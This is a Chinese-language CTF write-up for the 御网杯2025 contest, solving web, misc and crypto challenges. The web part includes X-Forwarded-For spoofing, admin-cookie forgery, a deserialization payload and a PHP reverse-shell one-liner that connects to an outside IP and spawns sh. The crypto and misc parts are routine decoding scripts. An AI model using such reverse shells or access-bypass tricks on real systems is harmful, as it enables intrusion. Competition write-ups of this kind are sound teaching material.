当前位置: 首页 > news >正文

御网杯2025 Web,Msic,密码 WP

Web

YWB_Web_xff

审计代码,发现需要$cip=2.2.2.1

使用burpsuite抓包,添加X-Forwarded-For:2.2.2.1

 

然后得到flag

 

YWB_Web_未授权访问

更加题目描述知道需要admin登录,但是现在是guest。

使用burpsuite抓包

发现cookie里面存在user,且是url编码的。

使用随波逐流进行url解码。

修改guest为admin,isAdmin为1

在进行url编码

最后修改burpsuite数据包里面的user。为刚刚加密出来的

获取到flag

 

 

Easyweb

代码审计发现只要输入命令exec就能够执行,但是exec函数没有回显,所以使用shell反弹

反弹命令:php -r '$sock=fsockopen("103.51.147.173",7777);exec("sh <&3 >&3 2>&3");'

Hacker传参cmd=php -r '$sock=fsockopen("103.51.147.173",7777);exec("sh <&3 >&3 2>&3");'

在进行一次url编码。同时服务器监听7777端口

可以看到监听成功

查看/flag.txt

Cat /flag.txt

 

YWB_Web_命令执行过滤绕过

根据提示:小明结合小华的代码又写了一个,你能分析代码找到flag吗?

右击源码发现了代码

想到了使用var_dump(file_get_contents()); 来绕过

 

发现了flag

 

 

YWB_Web_反序列化

题目内容:每一次反序列化都是一次艺术创作,构造出正确的对象与密码,揭开过滤后的秘密,找到埋藏的flag。

附件中给出了源码,审计发现,接收post参数msg并且帅冲filter过滤了(内容是flag,php)然后在进行判断,如果$a->pass === "myzS@11wawq"就能获取到flag

<?php
function filter($name){$safe = array("flag", "php");return str_replace($safe, "hack", $name);
}class mylogin {var $user;var $pass;function __construct($user, $pass) {$this->user = $user;$this->pass = $pass;}
}$m = new mylogin('FLAG.PHP','myzS@11wawq');
echo serialize($m);

 

将结果输入到页面中得到flag

 

 

 

MISC

ez_xor

根据题目名字可以知道是xor

使用python脚本

def decrypt_xor(ciphertext_hex: str, key: int) -> str:"""使用XOR密钥解密十六进制格式的密文参数:ciphertext_hex (str): 以十六进制字符串表示的密文,允许使用'-'分隔key (int): 用于解密的XOR密钥返回:str: 解密后的明文字符串异常:ValueError: 当输入的十六进制字符串格式不正确时抛出UnicodeDecodeError: 当解密后的字节无法转换为UTF-8字符串时抛出"""# 清理并验证十六进制输入clean_hex = ciphertext_hex.replace('-', '')if not all(c in '0123456789abcdefABCDEF' for c in clean_hex):raise ValueError("输入包含非十六进制字符")# 转换为字节并执行XOR解密ciphertext_bytes = bytes.fromhex(clean_hex)decrypted_bytes = bytes(b ^ key for b in ciphertext_bytes)# 尝试解码为UTF-8字符串try:return decrypted_bytes.decode('utf-8')except UnicodeDecodeError:# 如果无法解码为UTF-8,返回原始字节的十六进制表示print("警告: 解密结果不是有效的UTF-8字符串,返回原始字节")return decrypted_bytes.hex()# 使用示例
if __name__ == "__main__":ciphertext_hex = '5f-55-58-5e-42-71-7a-6d-7f-48-4e-5c-78-6a-7d-08-0e-0a-44'key = 0x39  # 密钥为0x39(十进制57)try:decrypted_text = decrypt_xor(ciphertext_hex, key)print(f"解密结果: {decrypted_text}")except (ValueError, UnicodeDecodeError) as e:print(f"解密失败: {e}")

跑出来flag

 

 

光隙中的寄生密钥

使用Formosa分离图片里的秘密.jpg

存在一个压缩包有密码,使用ARCHPR爆破,密码是9864

得到5a6d78685a337379566d516a545773324a5842534f58705949584e4266513d3d

放进随波逐流解码,得到116进制转字符

 

被折叠的显影图纸

有一个flag.xls直接拖到随波逐流,直接得到flag

 

ez_picture

将15.png拖入随波逐流

看到RGB通道疑似密码,尝试输入发现可以解压缩

存在1.jpg拖入随波逐流

在继续解码

 

 

easy_misc

77 49 66 77 83 107 104 68 78 70 81 50 90 50 104 87 98 87 74 76 97 88 66 51 98 50 78 112 81 88 100 89 83 109 82 81 89 107 112 70 83 68 73 61

发现一串10进制拖入随波逐流

发现10进制转字符串是base64

继续解码

 

发现是base58

 

 

 

 

套娃

解压发现txt是个压缩包

修改后缀为zip

发现还存在套娃继续修改后缀为zip

然后在world/document.xml文件下找到flag

 

 

 

CRYPTO

cry_rsa

跑脚本

def extended_gcd(a, b):"""计算最大公约数和贝祖系数"""if a == 0:return (b, 0, 1)else:g, y, x = extended_gcd(b % a, a)return (g, x - (b // a) * y, y)def modinv(a, m):"""计算a在模m下的乘法逆元"""g, x, y = extended_gcd(a, m)if g != 1:raise ValueError(f"逆元不存在,因为{gcd(a, m)} != 1")else:return x % mdef is_prime(n):"""检查数字是否为素数"""if n <= 1:return Falsefor i in range(2, int(n**0.5) + 1):if n % i == 0:return Falsereturn Truedef calculate_rsa_components(p, q, e):"""计算RSA密钥组件"""# 验证输入是否为素数if not (is_prime(p) and is_prime(q)):raise ValueError("p和q必须是素数")# 计算n和φ(n)n = p * qphi_n = (p - 1) * (q - 1)# 验证e是否有效from math import gcdif gcd(e, phi_n) != 1:raise ValueError("e和φ(n)必须互质")# 计算私钥指数dd = modinv(e, phi_n)return {'n': n,'phi_n': phi_n,'d': d,'flag': d + 2}def main():try:# RSA参数p = 473398607161q = 4511491e = 19# 计算RSA组件components = calculate_rsa_components(p, q, e)# 输出结果print("==== RSA密钥计算结果 ====")print(f"p = {p}")print(f"q = {q}")print(f"e = {e}")print(f"n = p * q = {components['n']}")print(f"φ(n) = (p-1)*(q-1) = {components['phi_n']}")print(f"私钥指数 d = {components['d']}")print(f"\nFLAG: flag{{{components['flag']}}}")except ValueError as ve:print(f"输入错误: {ve}")except Exception as e:print(f"计算过程出错: {e}")if __name__ == "__main__":
main()

从而得出flag

 

 

gift

向后移了五位p对应u,i对应n,e对应j

编写脚本跑

# 计算无穷级数 1 - 1/3 + 1/5 - 1/7 +...
def calculate_series():sum_series = 0sign = 1denominator = 1num_terms = 1000  # 计算的项数,可以调整以提高精度for _ in range(num_terms):sum_series += sign / denominatorsign = -signdenominator += 2return sum_series# 凯撒密码加密函数,偏移量为 2
def caesar_encrypt(text):encrypted_text = ""for char in text:if char.isalpha():if char.islower():new_char = chr((ord(char) - ord('a') + 2) % 26 + ord('a'))else:new_char = chr((ord(char) - ord('A') + 2) % 26 + ord('A'))else:new_char = charencrypted_text += new_charreturn encrypted_text# 主程序
if __name__ == "__main__":series_result = calculate_series()print(f"无穷级数的近似结果: {series_result}")original_text = "pie"encrypted_result = caesar_encrypt(original_text)print(f"加密后的结果: flag{{{encrypted_result}}}")

 

草甸方阵的密语        

存在一个exe文件,拖进winhex查看

 

复制到随波逐流进行栅栏解码

之后将10栏在进行一次凯撒

得到flag

 

 

easy-签到题

附件中同样存在exe文件,winhex打开

拖入随波逐流一键解码。

 

baby_rsa

用winhex打开得到e,N,c,然后使用factor在线网站http://www.factordb.com/index.php?id=1100000008203254317分解N,得到两个素数p,q

后面正常解rsa得到flag{5c9c885c361541e0b261f58b61db8cec}

根据附件将2替换成3得到最终flag{5c9c885c361541e0b361f58b61db8cec}

 

 

ez_base

打开附件发现是垃圾信息中提取邮件使用在线网站https://www.spammimic.com/decode.cgi decode出base64

再解base64得到flag{HNCTFCEwYSLFBHU8TF}

 

 

 

 

 

 

 

 

 

 

 

 

 

相关文章:

  • 深入解析多选字段的存储与查询:从位运算到数据库设计的最佳实践
  • uni-app学习笔记(二)--vue页面代码的构成和新建页面
  • html body 设置heigth 100%,body内元素设置margin-top出滚动条(margin 重叠问题)
  • [学习]RTKLib详解:convkml.c、convrnx.c与geoid.c
  • 二、transformers基础组件之Tokenizer
  • 智能座舱开发工程师面试题
  • vue中理解MVVM
  • Ubuntu 22虚拟机【网络故障】快速解决指南
  • Qt坐标系 + 信号和槽 + connect函数(8)
  • LangChain入门(七) 提取和输出结构化数据
  • AI Agent(10):个人助手应用
  • 19、DeepSeek LLM论文笔记
  • ActiveMQ 生产环境问题排查与调优指南(一)
  • C语音学习---函数指针
  • MyBatis源码解读4(2.3、MyBatis运行流程)
  • 【ajax基础】
  • openjdk底层汇编指令调用(一)——汇编指令及指令编码基础
  • 设计模式之工厂模式(二):实际案例
  • 医院药品管理系统(准备工作)
  • 『 测试 』测试基础
  • 小雨伞保险经纪母公司手回集团通过港交所聆讯
  • 远洋集团:今年前4个月销售80.9亿元,同比增加13.62%
  • 俄方代表团抵达土耳其,俄乌直接谈判有望于当地时间上午重启
  • 上海锦江乐园摩天轮正在拆除中,预计5月底6月初拆完
  • 92岁上海交大退休教师捐赠百万元给学校,其父也曾设奖学金
  • 为什么越来越多景区,把C位留给了书店?